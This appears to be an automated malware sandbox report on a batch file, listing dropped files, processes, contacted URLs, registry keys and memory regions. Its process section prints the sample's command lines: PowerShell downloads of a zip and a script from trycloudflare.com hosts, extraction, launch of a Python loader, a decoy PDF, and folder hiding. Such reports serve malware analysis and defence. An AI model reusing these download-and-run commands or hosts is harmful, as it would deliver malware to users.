Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
bas.cmd
|
DOS batch file, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xa76d9efa, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45ht20tf.23y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ycachth.hy0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5suvbnvh.dsm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmojxyey.k32.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmonyfee.iot.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5qrap1z.hvm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrcvuj2l.rao.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyt0rfry.1ks.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_BITS_6892_2065776899\BIT4183.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_BITS_6892_794445048\BITDCFB.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_BITS_6892_794445048\gonpemdgkjcecdgbnaabipppbmgfggbe_2024.05.14.00_all_pt6odrcwmcz2ifcbvpdpv25i3u.crx3
(copy)
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\_metadata\verified_contents.json
|
JSON data
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\manifest.json
|
JSON data
|
dropped
|
||
|
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\sets.json
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 72
|
HTML document, ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 73
|
HTML document, ASCII text
|
downloaded
|
There are 14 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bas.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip' -OutFile 'C:\Users\user\Downloads\jnk8ai.zip' }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\jnk8ai.zip' -DestinationPath 'C:\Users\user\Downloads'
-Force }"
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe hey.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe new.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe loader.py
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://gonna-truly-conflict-deserve.trycloudflare.com/update.cmd' -OutFile 'C:\Users\user\Downloads\update.cmd' }"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,15984810372542594167,14426285752425884727,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gonna-truly-conflict-deserve.trycloudflare.com/a.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13683390946796946304,14765207737704090902,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\attrib.exe
|
attrib +h "C:\Users\user\Downloads\Python"
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://gonna-truly-conflict-deserve.trycloudflare.com
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip
|
unknown
|
|
|
|
https://wieistmeineip.de
|
unknown
|
||
|
https://mercadoshops.com.co
|
unknown
|
||
|
https://gliadomain.com
|
unknown
|
||
|
https://poalim.xyz
|
unknown
|
||
|
https://mercadolivre.com
|
unknown
|
||
|
https://reshim.org
|
unknown
|
||
|
https://nourishingpursuits.com
|
unknown
|
||
|
https://medonet.pl
|
unknown
|
||
|
https://unotv.com
|
unknown
|
||
|
https://mercadoshops.com.br
|
unknown
|
||
|
https://joyreactor.cc
|
unknown
|
||
|
https://zdrowietvn.pl
|
unknown
|
||
|
https://songstats.com
|
unknown
|
||
|
https://baomoi.com
|
unknown
|
||
|
https://supereva.it
|
unknown
|
||
|
https://elfinancierocr.com
|
unknown
|
||
|
https://bolasport.com
|
unknown
|
||
|
https://rws1nvtvt.com
|
unknown
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip4d
|
unknown
|
||
|
https://desimartini.com
|
unknown
|
||
|
https://hearty.app
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://hearty.gift
|
unknown
|
||
|
https://mercadoshops.com
|
unknown
|
||
|
https://heartymail.com
|
unknown
|
||
|
https://radio2.be
|
unknown
|
||
|
https://finn.no
|
unknown
|
||
|
https://hc1.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://kompas.tv
|
unknown
|
||
|
https://mystudentdashboard.com
|
unknown
|
||
|
https://songshare.com
|
unknown
|
||
|
https://mercadopago.com.mx
|
unknown
|
||
|
https://talkdeskqaid.com
|
unknown
|
||
|
https://mercadopago.com.pe
|
unknown
|
||
|
https://cardsayings.net
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://mightytext.net
|
unknown
|
||
|
https://pudelek.pl
|
unknown
|
||
|
https://joyreactor.com
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://cookreactor.com
|
unknown
|
||
|
https://wildixin.com
|
unknown
|
||
|
https://eworkbookcloud.com
|
unknown
|
||
|
https://nacion.com
|
unknown
|
||
|
https://chennien.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://mercadopago.cl
|
unknown
|
||
|
https://talkdeskstgid.com
|
unknown
|
||
|
https://bonvivir.com
|
unknown
|
||
|
https://carcostadvisor.be
|
unknown
|
||
|
https://floor-contemporary-genius-accommodation.trycloudflare.com/favicon.ico
|
104.16.231.132
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zipc
|
unknown
|
||
|
https://salemovetravel.com
|
unknown
|
||
|
https://wpext.pl
|
unknown
|
||
|
https://welt.de
|
unknown
|
||
|
https://poalim.site
|
unknown
|
||
|
https://blackrockadvisorelite.it
|
unknown
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/update.cmdCommonPr
|
unknown
|
||
|
https://cafemedia.com
|
unknown
|
||
|
https://mercadoshops.com.ar
|
unknown
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zipw
|
unknown
|
||
|
https://elpais.uy
|
unknown
|
||
|
https://landyrev.com
|
unknown
|
||
|
https://commentcamarche.com
|
unknown
|
||
|
https://tucarro.com.ve
|
unknown
|
||
|
https://rws3nvtvt.com
|
unknown
|
||
|
https://eleconomista.net
|
unknown
|
||
|
https://mercadolivre.com.br
|
unknown
|
||
|
https://clmbtech.com
|
unknown
|
||
|
https://standardsandpraiserepurpose.com
|
unknown
|
||
|
https://salemovefinancial.com
|
unknown
|
||
|
https://mercadopago.com.br
|
unknown
|
||
|
https://commentcamarche.net
|
unknown
|
||
|
https://etfacademy.it
|
unknown
|
||
|
https://mighty-app.appspot.com
|
unknown
|
||
|
https://hj.rs
|
unknown
|
||
|
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
|
|||
|
https://hearty.me
|
unknown
|
||
|
https://mercadolibre.com.gt
|
unknown
|
||
|
https://timesinternet.in
|
unknown
|
||
|
https://idbs-staging.com
|
unknown
|
||
|
https://blackrock.com
|
unknown
|
||
|
https://idbs-eworkbook.com
|
unknown
|
||
|
https://mercadolibre.co.cr
|
unknown
|
||
|
https://hjck.com
|
unknown
|
||
|
https://vrt.be
|
unknown
|
||
|
https://prisjakt.no
|
unknown
|
||
|
https://kompas.com
|
unknown
|
||
|
https://idbs-dev.com
|
unknown
|
||
|
https://wingify.com
|
unknown
|
||
|
https://mercadolibre.cl
|
unknown
|
||
|
https://player.pl
|
unknown
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip4
|
unknown
|
||
|
https://mercadopago.com.ar
|
unknown
|
||
|
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip6
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
gonna-truly-conflict-deserve.trycloudflare.com
|
unknown
|
|
|
|
floor-contemporary-genius-accommodation.trycloudflare.com
|
104.16.231.132
|
||
|
google.com
|
142.250.185.206
|
||
|
www.google.com
|
142.250.186.100
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.7
|
unknown
|
unknown
|
||
|
104.16.231.132
|
floor-contemporary-genius-accommodation.trycloudflare.com
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.186.100
|
www.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21C0ABD0000
|
heap
|
page read and write
|
||
|
A065F8E000
|
stack
|
page read and write
|
||
|
1F54A81F000
|
heap
|
page read and write
|
||
|
22614370000
|
heap
|
page read and write
|
||
|
1F54A861000
|
heap
|
page read and write
|
||
|
22614458000
|
heap
|
page read and write
|
||
|
23D2B5BA000
|
heap
|
page read and write
|
||
|
1F545160000
|
heap
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
DCCE1FC000
|
stack
|
page read and write
|
||
|
1F54528D000
|
heap
|
page read and write
|
||
|
1BB50400000
|
heap
|
page read and write
|
||
|
23D2EF79000
|
trusted library allocation
|
page read and write
|
||
|
22614340000
|
heap
|
page read and write
|
||
|
A0667FE000
|
stack
|
page read and write
|
||
|
1E516B20000
|
heap
|
page read and write
|
||
|
25C5BC91000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F54A744000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
|
1F54AA90000
|
trusted library allocation
|
page read and write
|
||
|
1F54A760000
|
trusted library allocation
|
page read and write
|
||
|
76C97FD000
|
stack
|
page read and write
|
||
|
1F54A8FD000
|
heap
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
D00D1FE000
|
stack
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
226162A0000
|
heap
|
page read and write
|
||
|
25C73E24000
|
heap
|
page read and write
|
||
|
EFBF338000
|
stack
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
1F54A8EC000
|
heap
|
page read and write
|
||
|
23D2D390000
|
heap
|
page execute and read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
21C0CC02000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
1F545B13000
|
heap
|
page read and write
|
||
|
1F54B000000
|
heap
|
page read and write
|
||
|
25C5D420000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBA2000
|
trusted library allocation
|
page read and write
|
||
|
D00F0FE000
|
unkown
|
page readonly
|
||
|
25C59FE3000
|
trusted library allocation
|
page read and write
|
||
|
1F545B5C000
|
heap
|
page read and write
|
||
|
1F545213000
|
heap
|
page read and write
|
||
|
1F546040000
|
trusted library allocation
|
page read and write
|
||
|
23D2B5F9000
|
heap
|
page read and write
|
||
|
A0663FC000
|
stack
|
page read and write
|
||
|
1F54AA10000
|
trusted library allocation
|
page read and write
|
||
|
D00E27E000
|
stack
|
page read and write
|
||
|
7FFAACBBB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
53F952F000
|
stack
|
page read and write
|
||
|
1DC31402000
|
heap
|
page read and write
|
||
|
1F5452A1000
|
heap
|
page read and write
|
||
|
21C0AC4A000
|
heap
|
page read and write
|
||
|
23D2E9F7000
|
trusted library allocation
|
page read and write
|
||
|
23D3D401000
|
trusted library allocation
|
page read and write
|
||
|
1F54A8F4000
|
heap
|
page read and write
|
||
|
1F54A90A000
|
heap
|
page read and write
|
||
|
25C73DFF000
|
heap
|
page read and write
|
||
|
25C59EDD000
|
heap
|
page read and write
|
||
|
25C59FE0000
|
trusted library allocation
|
page read and write
|
||
|
1E516C08000
|
heap
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
1F5451C0000
|
trusted library allocation
|
page read and write
|
||
|
25C59DE0000
|
heap
|
page read and write
|
||
|
23D45B70000
|
heap
|
page read and write
|
||
|
1F54A745000
|
trusted library allocation
|
page read and write
|
||
|
1DC2F602000
|
heap
|
page read and write
|
||
|
76C98FC000
|
stack
|
page read and write
|
||
|
1DC2F669000
|
heap
|
page read and write
|
||
|
21C0AC60000
|
heap
|
page read and write
|
||
|
D00D8FE000
|
unkown
|
page readonly
|
||
|
A0665F9000
|
stack
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
21C0AC2B000
|
heap
|
page read and write
|
||
|
25C73F10000
|
heap
|
page read and write
|
||
|
7FFAACD41000
|
trusted library allocation
|
page read and write
|
||
|
AA284CE000
|
stack
|
page read and write
|
||
|
A0673CE000
|
stack
|
page read and write
|
||
|
23D2D632000
|
trusted library allocation
|
page read and write
|
||
|
1BB50465000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
23D2D3F0000
|
heap
|
page read and write
|
||
|
1F54A770000
|
trusted library allocation
|
page read and write
|
||
|
D00DFFE000
|
unkown
|
page readonly
|
||
|
1F545B1C000
|
heap
|
page read and write
|
||
|
76C96FF000
|
stack
|
page read and write
|
||
|
23D2B5FB000
|
heap
|
page read and write
|
||
|
25C73E65000
|
heap
|
page read and write
|
||
|
D00DD7E000
|
stack
|
page read and write
|
||
|
23D2B5C0000
|
heap
|
page read and write
|
||
|
1F54526E000
|
heap
|
page read and write
|
||
|
7DF402110000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D2E032000
|
trusted library allocation
|
page read and write
|
||
|
1F545D01000
|
trusted library allocation
|
page read and write
|
||
|
DCCDFFE000
|
stack
|
page read and write
|
||
|
21C0AC02000
|
heap
|
page read and write
|
||
|
25C73DDA000
|
heap
|
page read and write
|
||
|
A0662FF000
|
stack
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
1F54A8FB000
|
heap
|
page read and write
|
||
|
EFBF7FD000
|
stack
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
1F545329000
|
heap
|
page read and write
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
25C59E54000
|
heap
|
page read and write
|
||
|
CFC3B2C000
|
stack
|
page read and write
|
||
|
25C5BBF0000
|
heap
|
page execute and read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
1F54A6F3000
|
trusted library allocation
|
page read and write
|
||
|
A065FCE000
|
stack
|
page read and write
|
||
|
25C59EEF000
|
heap
|
page read and write
|
||
|
25C6BCA0000
|
trusted library allocation
|
page read and write
|
||
|
23D45620000
|
heap
|
page execute and read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
AA270A3000
|
stack
|
page read and write
|
||
|
25C5D5F5000
|
trusted library allocation
|
page read and write
|
||
|
25C5A030000
|
heap
|
page execute and read and write
|
||
|
1F546330000
|
trusted library section
|
page readonly
|
||
|
1DC2F613000
|
heap
|
page read and write
|
||
|
1F54AAE0000
|
remote allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
23D2CEE0000
|
heap
|
page readonly
|
||
|
1F54A930000
|
heap
|
page read and write
|
||
|
1F54522B000
|
heap
|
page read and write
|
||
|
23D457AD000
|
heap
|
page read and write
|
||
|
25C5D8D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD72000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB94000
|
trusted library allocation
|
page read and write
|
||
|
A06677A000
|
stack
|
page read and write
|
||
|
A066677000
|
stack
|
page read and write
|
||
|
7FFAACBAB000
|
trusted library allocation
|
page read and write
|
||
|
23D2CED0000
|
trusted library allocation
|
page read and write
|
||
|
25C5D80C000
|
trusted library allocation
|
page read and write
|
||
|
23D45510000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
22616402000
|
heap
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C59DC0000
|
heap
|
page read and write
|
||
|
23D2B643000
|
heap
|
page read and write
|
||
|
D00DDFE000
|
unkown
|
page readonly
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
23D2E57D000
|
trusted library allocation
|
page read and write
|
||
|
1F545200000
|
heap
|
page read and write
|
||
|
1E516A40000
|
heap
|
page read and write
|
||
|
23D2B670000
|
heap
|
page read and write
|
||
|
D00DB7E000
|
stack
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D2D489000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
D00DEFE000
|
unkown
|
page readonly
|
||
|
25C74166000
|
heap
|
page read and write
|
||
|
25C6BF81000
|
trusted library allocation
|
page read and write
|
||
|
1F545B1B000
|
heap
|
page read and write
|
||
|
21C0C670000
|
heap
|
page read and write
|
||
|
1F54A8A0000
|
trusted library allocation
|
page read and write
|
||
|
1F5466B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
A0668FE000
|
stack
|
page read and write
|
||
|
25C73F30000
|
heap
|
page read and write
|
||
|
D00E17E000
|
stack
|
page read and write
|
||
|
1F546300000
|
trusted library section
|
page readonly
|
||
|
23D45400000
|
heap
|
page read and write
|
||
|
1DC2F520000
|
heap
|
page read and write
|
||
|
7FFAACD4A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F5452A3000
|
heap
|
page read and write
|
||
|
1DC2F702000
|
heap
|
page read and write
|
||
|
25C5BEC1000
|
trusted library allocation
|
page read and write
|
||
|
23D2D2B0000
|
trusted library allocation
|
page read and write
|
||
|
22614502000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F545B9E000
|
heap
|
page read and write
|
||
|
25C5D5F7000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
1F5451D0000
|
trusted library section
|
page read and write
|
||
|
AA2787B000
|
stack
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
1F54A780000
|
trusted library allocation
|
page read and write
|
||
|
23D2D401000
|
trusted library allocation
|
page read and write
|
||
|
1F54AA10000
|
trusted library allocation
|
page read and write
|
||
|
D00EAFE000
|
unkown
|
page readonly
|
||
|
23D455D7000
|
heap
|
page read and write
|
||
|
1F54A90A000
|
heap
|
page read and write
|
||
|
21C0AC13000
|
heap
|
page read and write
|
||
|
1F54A6B0000
|
trusted library allocation
|
page read and write
|
||
|
1E518670000
|
heap
|
page read and write
|
||
|
AA274FD000
|
stack
|
page read and write
|
||
|
1BB4EB38000
|
heap
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F545B5C000
|
heap
|
page read and write
|
||
|
25C5A037000
|
heap
|
page execute and read and write
|
||
|
1F54A8C2000
|
heap
|
page read and write
|
||
|
25C7413A000
|
heap
|
page read and write
|
||
|
25C59E56000
|
heap
|
page read and write
|
||
|
1F545B1A000
|
heap
|
page read and write
|
||
|
25C5D649000
|
trusted library allocation
|
page read and write
|
||
|
1F545A15000
|
heap
|
page read and write
|
||
|
22614402000
|
heap
|
page read and write
|
||
|
1F54A8C4000
|
heap
|
page read and write
|
||
|
DCCDCFE000
|
stack
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
1DC2F440000
|
heap
|
page read and write
|
||
|
25C73E75000
|
heap
|
page read and write
|
||
|
21C0CB30000
|
heap
|
page read and write
|
||
|
1F54A784000
|
trusted library allocation
|
page read and write
|
||
|
A0669FB000
|
stack
|
page read and write
|
||
|
1F54A741000
|
trusted library allocation
|
page read and write
|
||
|
AA271EF000
|
stack
|
page read and write
|
||
|
22614446000
|
heap
|
page read and write
|
||
|
7FFAACBEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D2D273000
|
trusted library allocation
|
page read and write
|
||
|
D00CFF7000
|
stack
|
page read and write
|
||
|
76C94FF000
|
stack
|
page read and write
|
||
|
1F545296000
|
heap
|
page read and write
|
||
|
1F54A854000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F545190000
|
heap
|
page read and write
|
||
|
23D2B63A000
|
heap
|
page read and write
|
||
|
D00D0FE000
|
unkown
|
page readonly
|
||
|
1DC2F600000
|
heap
|
page read and write
|
||
|
7FFB1D60D000
|
unkown
|
page readonly
|
||
|
25C73DA0000
|
heap
|
page read and write
|
||
|
23D2B577000
|
heap
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
25C5A020000
|
trusted library allocation
|
page read and write
|
||
|
25C5D8D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
AA276F9000
|
stack
|
page read and write
|
||
|
1F54A740000
|
trusted library allocation
|
page read and write
|
||
|
76C92F7000
|
stack
|
page read and write
|
||
|
23D2B63C000
|
heap
|
page read and write
|
||
|
1F545B00000
|
heap
|
page read and write
|
||
|
1F54A6C0000
|
trusted library allocation
|
page read and write
|
||
|
DCCDDFE000
|
stack
|
page read and write
|
||
|
23D2B5B4000
|
heap
|
page read and write
|
||
|
AA2797E000
|
stack
|
page read and write
|
||
|
23D2B6C4000
|
heap
|
page read and write
|
||
|
7FFB1D609000
|
unkown
|
page readonly
|
||
|
1F545180000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F5452FF000
|
heap
|
page read and write
|
||
|
23D457A0000
|
heap
|
page read and write
|
||
|
AA277FA000
|
stack
|
page read and write
|
||
|
1F54A941000
|
heap
|
page read and write
|
||
|
AA2844F000
|
stack
|
page read and write
|
||
|
EFBFAFE000
|
stack
|
page read and write
|
||
|
1F54A82C000
|
heap
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC56000
|
trusted library allocation
|
page read and write
|
||
|
D00DBFE000
|
unkown
|
page readonly
|
||
|
D00E5FB000
|
stack
|
page read and write
|
||
|
23D2CEB0000
|
trusted library allocation
|
page read and write
|
||
|
D00E3FE000
|
stack
|
page read and write
